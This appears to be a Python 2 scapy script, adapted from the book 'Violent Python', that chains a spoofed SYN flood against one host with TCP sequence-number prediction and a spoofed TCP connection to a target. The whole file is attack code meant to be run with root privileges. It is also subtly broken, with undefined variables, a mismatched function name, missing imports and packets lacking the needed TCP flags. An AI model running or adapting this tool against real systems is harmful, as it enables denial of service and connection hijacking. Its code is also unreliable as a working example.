#!/usr/bin/env python2
# written by Moses Arocha
# Written with the help of TJ O'Connor in his book "Violent Python"

import optparse
from scapy.all import *

def synFlood(src, tgt):
	for sport in range(1024, 65535):
		IPlayer = IP(src=src, dst=tgt)
		TCPlayer = TCP(sport=sport, dport=80)
		pkt = IPlayer / TCPlayer
		send(pkt)

def callTSN(tgt):
	seqNum = 0
	preNum = 0
	diffSeq = 0
	for x in range(1, 5):
		if preNum != 0:
			preNum = seqNum
		pkt = IP(dst=tgt)
		ans = sr1(pkt, verbose=0)
		seqNum = ans.getlayer(TCP).seq
		diffSeq = SeqNum - repNum
		print '\t[+] TCP Sequence Difference: ' + str(diffSeq)
	return seqNum + diffSeq

def SpoofConn(src, tgt, ack):
	IPlayer = IP(src=src, dst=tgt)
	TCPlayer = TCP(sport=80, dport=81)
	synPkt = IPlayer / TCPlayer
	send(synPkt)
	IPlayer = IP(src=src, dst=tgt)
	TCPlayer = TCP(sport=80, dport=81)
	ackPkt = IPlayer / TCPlayer
	send(ackPkt)

def main():
	if not os.geteuid() == 0:
		sys.exit('\tMust Be Root!')
	parser = optparse.OptionParser("Usages From Program: -S <Source for SYN Flood> -R <Source for Spoofed Connection> -T <Target Address>")
	parser.add_option('-S', dest='synSpoof', type='string', help='Specific src for SYN Flood')
	parser.add_option('-R', dest='srcSpoof', type='string', help='Specific src for spoofed connection')
	parser.add_option('-T', dest='tgt', type='string', help='specify target address')
	(options, args) = parser.parse_args()
	if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
		print parser.usage
		exit(0)
	else:
		synSpoof = options.synSpoof
		srcSpoof = options.srcSpoof
		tgt = options.tgt
	print '\t[+] Starting SYN Flood To Kill Server'
	synFlood(synSpoof, srcSpoof)
	print '\t[+] Calculating correct TCP Sequence Number'
	seqNum = callTSN(tgt) + 1
	print '\t[+] Attempting To Spoof TCP Connection'
	spoofConn(srcSpoof, tgt, seqNum)
	print '\t[+] Task Complete'
	
if __name__ == '__main__':
	main()
